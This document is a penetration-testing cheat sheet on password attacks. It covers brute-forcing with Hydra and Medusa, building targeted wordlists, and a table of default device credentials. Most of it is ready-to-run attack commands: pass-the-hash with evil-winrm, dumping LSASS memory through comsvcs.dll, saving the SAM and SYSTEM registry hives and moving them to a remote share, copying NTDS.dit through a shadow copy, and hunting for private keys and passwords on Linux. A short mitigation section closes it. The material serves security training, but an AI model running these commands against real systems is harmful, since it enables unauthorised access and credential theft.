Password Attack Methodology & Workflow

Password Attack Methodology Workflow

A structured approach is vital for effective and efficient password attacks during a penetration test.

Phase	Goal	Techniques & Tools	Output/Next Steps
1. Information Gathering & Target Identification	Identify accounts, services, and policies.	User enumeration (e.g., AD, SMB, web forms), service fingerprinting (nmap), password policy analysis (manual testing, ADRecon).	List of valid/likely usernames, list of target services, established password policy.
2. Wordlist Generation & Customization	Create a highly relevant, customized wordlist.	cewl, CUPP, username-anarchy, policy filtering (grep), rule-based mutations (hashcat rules).	A high-quality, targeted wordlist and/or mutation rules file.
3. Offline Password Cracking (if hashes are obtained)	Crack acquired hashes quickly using high-speed tools.	Hashcat, John the Ripper, pypykatz, secretsdump.py.	Cracked plaintext passwords, or partially cracked lists.
4. Online Password Attacks	Attempt login against services with generated credentials.	Hydra, Medusa, CrackMapExec, evil-winrm, nmap scripts.	Successful logins, or a list of services where account lockouts occurred.
5. Post-Exploitation / Local Credential Hunting	Search the compromised system for cached or stored credentials/hashes.	Windows: mimikatz, PowerShell commands, findstr. Linux: grep, history files, configuration files.	New set of credentials/hashes for further lateral movement.

---

Login Brute-Forcing

What is Brute Forcing?

A trial-and-error method is used to crack passwords, login credentials, or encryption keys by systematically testing every possible character combination.

Factors Influencing Brute Force Attacks

• Complexity of the password or key: Higher complexity (length, character set) increases time exponentially.

• Computational power available to the attacker: Measured in keyspace/hashes per second (KPS/HPS).

• Security measures in place: Account lockout policies, CAPTCHA, and multi-factor authentication (MFA).

How Brute Forcing Works

1. Start: The attacker initiates the brute force process.

2. Generate Possible Combination: The software generates a potential password or key combination.

3. Apply Combination: The generated combination is attempted against the target system.

4. Check if Successful: The system evaluates the attempted combination.

5. Access Granted (if successful): The attacker gains unauthorised access.

6. End (if unsuccessful): The process repeats until the correct combination is found or the attacker gives up.

Types of Brute Forcing

Attack Type	Description	Best Used When	Defensive Consideration
Simple Brute Force	Tries every possible character combination in a set.	Impractical for modern systems; used against short or very weak keys.	Rate limiting and CAPTCHA implementation.
Dictionary Attack	Uses a pre-compiled list of common or leaked passwords.	The password is likely weak or common.	Strict password complexity and auditing against common wordlists.
Hybrid Attack	Combines dictionary attacks with rule-based mutations (e.g., appending numbers, capitalizing).	Target uses modified common passwords (e.g., Summer2025!).	Requires highly customized rule sets to defend against effectively.
Credential Stuffing	Uses leaked username:password pairs from other breaches.	Target may reuse passwords across multiple services.	Enforce unique, strong passwords and use MFA.
Password Spraying	Attempts a few common passwords across many accounts before moving to the next password.	Account lockout policies are in place, trying to avoid locking a single account.	Enforce minimum 12-character passwords; monitor organization-wide failed logins.
Rainbow Table Attack	Uses precomputed tables of password hashes.	Cracking a large number of unsalted password hashes (less effective today).	Always use modern, salted hashing algorithms (Argon2, bcrypt).
Reverse Brute Force	Targets a known password against multiple usernames.	Password reuse is suspected among employees.	Enforce strong, unique passwords and monitor widespread attempts using a single common password.
Distributed Brute Force	Distributes attempts across multiple machines (Botnet, cloud infrastructure).	Password is complex, and one machine isn't enough.	Implement rate limiting and geographical IP filtering.

Default Credentials

Device	Username	Password	Notes
Linksys Router	admin	admin	Often used on consumer-grade devices.
Netgear Router	admin	password	Common default for older equipment.
TP-Link Router	admin	admin	Often used for initial setup.
Cisco Router	cisco	cisco	Default for IOS devices.
Ubiquiti UniFi AP	ubnt	ubnt	Common for UniFi devices during setup.
Tomcat Manager	tomcat	s3cret	Check deployment guides for specifics.

---

Brute-Forcing Tools

Hydra

• Fast network login cracker supporting protocols like FTP, SSH, HTTP, RDP, VNC, and more.

# Brute force FTP login for a known user "admin"
hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100

# Brute force SSH using a user list and a password file
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# Brute force a common HTTP POST form login (e.g., website)
hydra -l admin -P /path/to/password_list.txt 127.0.0.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
# *Note:* F=incorrect specifies the string indicating a failed login.

# Brute force a known user with a single password list against multiple protocols
hydra -l administrator -P rockyou.txt -M targets.txt ftp ssh pop3 -t 4

Medusa

• Massively parallel, modular login brute-forcer.

# Brute force SSH using a single user and a password list, limiting threads
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -t 5

# Brute force FTP using a user list and a password list
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ftp -t 5

# Brute force RDP (Remote Desktop)
medusa -h 192.168.1.100 -u admin -P passwords.txt -M rdp

---

Custom Wordlists & Filtering

Wordlist Generation and Mutation

CUPP (Common User Passwords Profiler)

Creates wordlists based on personal information (name, pet, birthday, partner's name, etc.)

# Interactive mode to create a personal wordlist for a target
cupp -i 

# Generate a wordlist from a profile file
cupp -w profiles.txt

Username Anarchy

Generates potential usernames based on common naming conventions.

# Generate usernames from 'Jane Smith' based on common formats
username-anarchy Jane Smith

# Generate usernames from a list of first and last names
username-anarchy -i names.txt

# Generate usernames and append a specific domain
username-anarchy -i names.txt -@ example.com

Cewl

Extracts keywords from a target website to create a relevant dictionary.

# Generate a wordlist from a website, max depth 4, min length 6, all lowercase
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist

# Generate rule-based word list using Hashcat and a common rule set
hashcat --force password.list -r /usr/share/hashcat/rules/rockyou-30000.rule --stdout > mut_password.list

Password Policy Filtering

Use grep to filter a large wordlist (wordlist.txt) to match a known policy, improving attack efficiency.

Policy Requirement	Grep Regex Pattern	Explanation
Minimum Length (8 chars)	grep -E '^.{8,}$' wordlist.txt	At least 8 characters long.
At Least One Uppercase Letter	grep -E '[A-Z]' wordlist.txt	Contains an uppercase letter.
At Least One Digit	grep -E '[0-9]' wordlist.txt	Contains a digit.
At Least One Special Character	grep -E '[!@#$%^&*()_+-=[]{};':",.<>/?]' wordlist.txt	Contains a special character.
Combined Policy (8 chars, Upper, Lower, Digit)	grep -E '^.{8,}$' wordlist.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]'	Pipes filters together for a highly targeted list.
Exclude Common Patterns	grep -v -i 'password|admin|123' wordlist.txt	Excludes words like "password" or "admin" (case-insensitive).

---

Remote Password Attacks

These attacks target network services, which are often detected via nmap.

# Brute-force WinRM service using user and password lists (CrackMapExec)
crackmapexec winrm <ip> -u user.list -p password.list

# Enumerate SMB shares using specified credentials
crackmapexec smb <ip> -u "user" -p "password" --shares

# Attempt password cracking over specified service with Hydra (General)
hydra -L user.list -P password.list <service>://<ip>
hydra -l username -P password.list <service>://<ip>
hydra -L user.list -p password <service>://<ip>

# Dump password hashes from a domain controller using CrackMapExec (NTDS)
crackmapexec smb <ip> -u <domain>\administrator -p <password> --ntds

# Establish a PowerShell session using Evil-WinRM (Pass-the-Hash)
evil-winrm -i <ip> -u Administrator -H "<passwordhash>"

---

Local Credential Hunting

Windows Local Password Attacks

# List running processes to identify security tools or credential managers
tasklist /svc

# Search files for "password" in common configuration file types
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

# Dump LSASS process memory (requires high integrity)
# 1. Get LSASS PID (e.g., PID 672)
Get-Process lsass
# 2. Use comsvcs.dll to create a minidump
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

# Extract credentials from LSASS dump (using pypykatz or mimikatz)
pypykatz lsa minidump /path/to/lsassdumpfile

# Save and move registry hives (SAM and SYSTEM for local hashes)
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
move sam.save \\<ip>\NameofFileShare

# Dump password hashes from registry hives using secretsdump.py
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Create volume shadow copy and copy NTDS.dit (Domain Controller)
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

Linux Local Password Attacks

# Find configuration files globally
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

# Search for credentials (user/password/pass) in found config files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

# Find common database files
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

# Search for private keys (e.g., SSH keys)
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

# Extract last 5 lines from bash history for all users
tail -n5 /home/*/.bash*

---

Cracking Passwords (Offline)

Hashcat (GPU-Accelerated)

# Crack NTLM hashes (Mode 1000) with Hashcat and the rockyou wordlist
hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt

# Crack a single NTLM hash and show results
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show

John the Ripper (CPU-Optimised)

# Combine passwd and shadow files for cracking (Linux hashes)
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

# Crack unshadowed hashes (Mode 1800 is SHA512-Crypt)
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/unshadowed.hashes

# Extract SSH key hashes and crack them
python3 /usr/share/john/ssh2john.py SSH.private > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt --show

# Extract and crack Office file hashes
office2john.py Protected.docx > protected-docx.hash
john --wordlist=rockyou.txt protected-docx.hash

File Hash Extraction

File Type	Tool	Command
PDF	pdf2john.pl	pdf2john.pl PDF.pdf > pdf.hash
ZIP/RAR	zip2john/rar2john	zip2john ZIP.zip > zip.hash
BitLocker	bitlocker2john	bitlocker2john -i Backup.vhd > backup.hashes

Decryption (Fallback)

# Decrypt encrypted files with OpenSSL using a wordlist (slow and noisy)
for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done

---

Mitigation & Defence Strategies

A good pentester understands how to defend against the attacks they perform.

• Hashing & Salting: Use strong, modern, and slow hashing algorithms such as Argon2, bcrypt, or scrypt (not MD5 or SHA-1), and ensure hashes are properly salted.

• Account Lockout & Rate Limiting: Implement policies to lock accounts after a small number of failed attempts (e.g., 5). Apply rate limiting at the network level (e.g., WAF) to throttle connection attempts from a single IP.

• Multi-Factor Authentication (MFA): The single most effective countermeasure against credential-based attacks. Enforce MFA for all critical accounts.

• Strong Password Policy: Enforce a minimum length of at least 12 characters and actively check new passwords against leaked password lists (e.g., using Have I Been Pwned's dataset).

• Principle of Least Privilege (PoLP): Limit what a user can access if their account is compromised.

• Monitoring & Alerting: Monitor login attempts and failed logins. Look for patterns indicative of password spraying (a single password failing across many accounts) or credential stuffing (known bad IPs attempting logins).

---